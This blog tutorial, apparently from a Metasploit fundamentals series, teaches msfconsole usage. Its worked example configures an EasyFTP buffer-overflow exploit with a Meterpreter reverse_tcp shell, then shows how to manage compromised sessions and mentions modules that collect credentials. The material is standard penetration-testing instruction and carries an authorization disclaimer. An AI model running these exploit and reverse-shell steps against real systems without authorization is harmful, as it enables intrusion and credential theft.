Metasploit Fundamentals (2 of 5) – The Metasploit Console

This is the first in a five part series on the fundamentals of Metasploit that I wrote back in 2014.  While some of the specifics have changed over time, the series still provides a good overview for the new user of Metasploit.

Links to all of the articles are listed below:

Overview

In this article we are going to take a look at the most frequently used component of the Metasploit Framework: the Metasploit Console.  While you can certainly get to everything in the console from direct command line access, when you are first starting up you’ll likely want something to help you navigate through all the options that Metasploit has, find settings, configure exploits, manage sessions.  If you haven’t read Part 1 of this series, Metasploit Overview and Tools, it is highly recommended that you do so at this time to get a base familiarity with the terms and concepts that we will be discussing here.

The information in this article was current as of Metasploit 4.7, and the examples that are shown were obtained using Kali Linux.

DISCLAIMER: All discussions of exploitation and compromise are made only with regard to systems that you either personally own or have been authorized by the owner in writing to assess.  The author does not condone or encourage the attacking, exploitation, or compromise of systems that do not meet those criteria.

Starting the Console

For all of the articles in this series we will assume that you are using Kali Linux 1.x with Metasploit 4.7.  If you are using Windows or Mac OSX as your base operating system the syntax for starting the Metasploit Console will be slightly different, but once you get into it the Metasploit Console has the same features and syntax across all platforms.

To start the Metasploit Console from Kali Linux, first open a terminal window by using the menu bar “Applications” –> “Accessories” –> “Terminal” and then type

msfconsole

and press enter.  That’s it. After a moment or two you’ll be presented with one of the many witty banners that are built in showing the version and making a reference to Metasploit’s many capabilities and uses.  In fact, if you want to see another one just type

banner

and press enter.

Locations in the Metasploit Console

When you’re using the Metasploit Console you’ll need to be aware of where you are, because commands are applied relative to your location. At any given time you can tell if you are interacting with Metasploit itself by looking for the

msf

at the start of the command prompt (you won’t see anything other than this to start with, but keep it in mind for when you open your first session).

If you don’t have a module selected yet you will just see

msf >

indicating that you are interacting with the global Metasploit  Console settings.  Once you’ve selected a module that name will be added to the prompt to let you know that you are configuring settings for just that module.  Additionally, the command line will show what type of module it is.  For example:

  • msf post(netrc_creds) >

    This indicates that you are using the post-exploitation module “netrc_creds”, a module that collects credentials from .netrc files on *nix filesystems.

  • msf exploit(netcat110_nt) >

    This indicates that you are using the exploit module “netcat110_nt”, a module that exploits a buffer overflow condition in Netcat version 1.10 NT.

  • msf auxiliary(http_login) >

    This indicates that you are using the auxiliary module “http_login”, a module which tries to bruteforce logins via HTTP.

As with everyting else we’re going to discuss in this article, there are of course more options available.  Pay attention as we move through the rest of the interface and see what other ones you notice!

Interacting with the Metasploit Console

The Metasploit Console has a wide range of features designed to make finding information and avoiding input errors easy.  Here are just a few of them:

  • Arrow Keys: You can navigate up and down through the history of commands you’ve entered by using the up and down arrow keys.
  • Tab Completion: If you enter a unique part of a command you can just use the tab key to auto-complete part or all of the rest of the command.  For instance, type
    use e

    and press the tab key twice… you’ll be prompted to show over 1000 possible options for completion (if a single completion is available it will just complete).  Now try

    use en

    and press the tab key; notice how it automatically fills in to show a command?

    use encoder/

    That’s because the only valid input that starts with “use en” is that command.

  • Search Commands: Maybe you normally use the arrow keys, but that command you entered 4 hours ago before a marathon session isn’t coming back to you right now.  Just search for it!  Press CTRL+R and then start typing whatever you can remember of it. When you find the command you are looking for just press the enter key to execute it (or press the escape key to edit it).

There are many more, but these three will help you navigate quickly the interface quickly and easily.

Getting Help

There are three key help commands that you should be familiar with before beginning to use the Metasploit Console, each with a slightly different scope.  Let’s go over them now:

  • Global Help: The
    help

    or

    ?

    command will show the list of global commands that exist.  For instance, typing

    help

    when you first start will display a list of core commands, including the help commands and “back”, “banner”, “cd”, “color”, etc.  Moreover, if you need help with a particular global command just add it to the help command.  For example,

    help search

    will show you all of the options for the search command.  Give the following commands a try and see what you find:

    help search
    help info
    help show
    help help
  • Module Information: If you want to know about a particular module, this command is probably what you’re looking for:
    info

    This will give you an overview of the module, all the targets it applies to, the configurable options, available payload space, and even references that describe the vulnerability or methods that are exploited/used by the module.  To see information about the current module just type

    info

    or to see information about another module (or if no module is currently selected) just type

    info {module_name}

    Note that for modules you have to specify the full name, such as

    info exploit/windows/browser/ms08_053_mediaencoder
  • Configured Options: If you want to know how Metasploit itself is currently configured, or how a module is configured, there are two ways to do so.  For module-specific information you can use the
    info

    command listed above, but that is slightly limited in that it won’t show you payload configurations.  For that reason, I prefer to use the

    show

    command to find out how things are set up.  If you use

    show

    by itself you will see a list of every module and configuration set up, so take care. Just use the

    show options

    command to see what has been configured for the currently selected module, or to see the settings for Metasploit itself issue the

    show options

    command without a module selected, when the prompt says

    msf >

Finding and Selecting Modules

Okay, so at this point we’ve made several references to selecting modules, but you may be wondering how we go about doing that.  For that matter, how do we even know what modules are available?  Well, let’s start at the beginning.

Let’s assume for the sake of argument that you’ve already performed a network scan of your target and found a list of services that are running on it and responding to connection requests, as well as the version of the operating system. Maybe you found a Microsoft Windows XP SP 3 system with an EasyFTP version 1.7.0.8 server on it. How can we find out if there are any exploits in Metasploit that might be capable of exploiting this? Let’s look at three ways, from the most exhaustive but manual to the most tailored approach.

  • Manual Search: If you’re a true masochist, you can look through the list of all exploits available by using this command:
    show exploits

    That will dump out a list of every exploit available in Metasploit, including AIX, Linux, Windows, and Mac exploits.  It’s not pretty, but you will definitely be able to know without any doubt if there is a match… assuming you can stay awake long enough to review them all.  There has to be a better way…

  • General Search: Okay, so reviewing everything  clearly isn’t a great option (although it’s worth doing every once in awhile just to get a feel for what Metasploit has added and refresh your knowledge of the modules).  Why not just search for an exploit? We can do that using this command:
    search FTP

    This will give us a much shorter list, but will still show us results from multiple operating systems, post-exploitation modules, and even denial of service attacks.  There has to be a BETTER better way…

  • Targeted Search: Let’s review what we’re looking for.  We’d like to find an exploit for a Windows installation of EasyFTP.  If we use
    help search

    to see all the available options we can see that the “search” command can take options to restrict our searches even further.  Try the following command and see what you get back this time:

    search platform:windows type:exploit EasyFTP

    You should see something like this:

    Matching Modules
    ================
    Name                                     Disclosure Date  Rank   Description
    ----                                     ---------------  ----   -----------
    exploit/windows/ftp/easyftp_cwd_fixret   2010-02-16       great  EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
    exploit/windows/ftp/easyftp_list_fixret  2010-07-05       great  EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
    exploit/windows/ftp/easyftp_mkd_fixret   2010-04-04       great  EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
    exploit/windows/http/easyftp_list        2010-02-18       great  EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
    

    Looks like we’ve found a match (or four)! Once we’ve found a module it’s actually rather simple to use it… just type

    use

    followed by the full module name.  For example, to use one of the EasyFTP modules we found previously we could just do the following:

    use exploit/windows/ftp/easyftp_list_fixret

    After we do that our command prompt should update to reflect that we are now using a particular module, so you should see this:

    msf exploit(easyftp_list_fixret) >

    Before we go any further, let’s cover how to STOP using a module. To do so, just type “back” and you will return to the main Metasploit configuration instead of any particular module. I like to use this whenever I’ve finished with one module just to ensure that I don’t accidentally start trying to configure a new module while I’m still selected on the old one. If you just typed:

    back

    let’s use that easyftp_list_fixret module again… you know how now.

    Configuring Modules

    So all of this is great, but up until now we’ve just been browsing around. Now it’s time to actually start configuring a module. As with most things, this is straightforward. Let’s get a list of the options available to us for our EasyFTP server and configure the module to attack our target.

    First up, we need to know what can be configured. If you remember there are a couple of ways to do this. Typing just

    info

    will give us the full list of information about the module, and is something I personally do for each module just to understand what it will be doing, what the limits are, and what it will be targeting. To just see the list of options, though, we can also type

    show options

    Give both a try now and compare the differences between the two. Okay, you should have noticed that this module has five things we can configure (technically there is a sixth, but we’ll get to that in a moment).

    First up are the username and password for the FTP server.  Notice also that these are both set to not be required, because Metasploit will attempt to do an anonymous login (with username “anonymous” and password “mozilla@example.com”) if they aren’t provided. After that we have the remote host (RHOST) and port (RPORT) of the server, and we do need to configure these. There’s also a TARGET option to determine what the host operating system is, but it defaulted to the correct value for us so we don’t need to change it (technically, this particular exploit only has one target).

    To set any parameter in Metasploit we just use the

    set

    command followed by the parameter name and value separated by a space. If we need to specify a value that includes a space just wrap it in quotes. Let’s assume that the EasyFTP server we found is hosted on 10.10.10.20. To set that parameter we just need to enter the following command:

    set RHOST 10.10.10.20

    Metasploit will show us that the value was set successfully by responding with the parameter and value, such as:

    RHOST => 10.10.10.20

    You’ll also notice that Metasploit automatically set the port to 21, which is the default setting for both this program and FTP.

    That’s all there is to it.  This module is now configured.  Of course, it won’t DO anything…

    Selecting Payloads

    Remember when you looked at that “info” command? You may have noticed that there was a section that said something about payloads, specifically that this exploit has space for a 512 character payload and has to avoid 5 characters.  One of the great things about Metasploit is that it will automatically limit and configure payloads (assuming you give it the necessary information) and insert them into modules, and setup any backend properties necessary to complete the exploitation.  Let’s select a payload for our exploit now.

    If you want to see a list of all the payloads Metasploit comes with, just type

    search payloads

    but note that not everything shown is valid for the currently selected exploit.  Selecting which payload to use is a bit beyond the scope of this article, so for right now we’ll just default to a reverse TCP connection payload that will spawn a Meterpreter shell, which is a full-featured shell provided by Metasploit that can automate many post-exploitation features as well as let you execute Metasploit modules on a compromised system.

    Remember how we said before that there is technically a sixth parameter that can be configured?  Well, this is it.  To select the payload, we just type the “set” command again and use the “PAYLOAD” parameter, like so:

    set PAYLOAD windows/meterpreter/reverse_tcp

    Metasploit will confirm it like this:

    PAYLOAD => windows/meterpreter/reverse_tcp

    Now if we run

    show option

    we’ll see they payload options as well.  Let’s get those configured!

    I recommend leaving the “EXITFUNC” option alone until you are more comfortable with the way exploits work, so in this case we’ll leave it as “thread”. The only things we need to configure are the local host (our machine) and port that we will wait for a connection on once the exploit goes off. For instance, >we might do the following (assuming our IP is 10.10.10.5):

    set LHOST 10.10.10.5
    LHOST => 10.10.10.5
    set LPORT 12345
    LPORT => 12345

    That’s it.  Type

    show options

    one last time and you can see everything configured.

    NOTE: If you accidentally set something and want to return it to the default value just type “unset” followed by the parameter name, such as:

    unset LHOST

    Running an Exploit

    At this point, running the exploit itself is rather anti-climatic.  Just type the command

    exploit

    and let it go.  Metasploit will let you know when it binds a Meterpreter handler to port 12345, run the exploit, and give you a shell on the remote system.  That’s all there is to it.

    Interacting with Sessions

    Metasploit has the ability to manage multiple sessions, or connections, to exploited systems.  This allows you to perform several operations simultaneously, such as gathering credentials from one system while you perform a port scan from another.

    Once you have opened a session all of the commands you enter are sent to either the system itself (if you opened a direct shell or opted for a system shell from Meterpreter) or to Meterpreter itself.  To return to the previous interface you were using from a Meterpreter session just type

    background

    and you will go up one level (for system shells you will need to exit that shell).

    Let’s say you’ve used “background” several times and exploited three boxes, and now want to go back and interact with that first session you opened. To do so, from the Metasploit Console just type the following command:

    sessions -l

    This will give you a list of the sessions that are available.  You will notice a session ID for each session that is active.  To start interacting with that session again just type the following command:

    sessions -i {session_id}

    That’s all there is to it.  If you want to kill a session, it’s done in almost exactly the same way.  Note the session ID that you want to kill and then enter this command:

    sessions -k {session_id}

    Finally, if you want to run a particular command across all of your sessions you can do so with this command:

    sessions -c {command}

    I use this last one a lot to do things like tell all my Meterpreter sessions to try to gain system access, especially after connecting to a large number of systems that all had the same vulnerability.

    Summary

    There’s been a lot of content crunched into this article, so please browse around and get familiar with the things we’ve gone over. In the next article we’ll be looking at how to use a system on two different networks as a pivot point to gain access… basically turning it into our personal router. This technique becomes absolutely required when we are looking at navigating from a less trusted network to a more trusted (and non-routable one) and only have a single system that is multi-homed (connected to both networks).

Comments are closed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: